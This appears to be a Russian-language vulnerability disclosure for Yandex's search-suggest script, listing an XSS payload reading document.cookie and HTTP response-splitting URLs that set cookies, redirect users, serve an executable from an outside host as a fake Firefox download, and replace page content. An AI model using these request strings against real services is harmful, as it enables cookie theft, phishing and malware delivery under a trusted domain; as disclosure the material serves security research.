В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости
* Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /suggest-ya.cgi
Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=alert(document.cookie)
* Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)
Приложение: /suggest-ya.cgi
GET-переменные: ct
Пример: ttp://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)
Простые примеры применения, не говоря уже о сложных вариантах.
* Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru
* Использование уязвимостей других приложений или распостранение вирусов (подмена content-type)
Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса
http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru
Или любое другое приложение или мультимедиа-файл. К примеру.
http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru
* Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru//&part=fuzzing.ru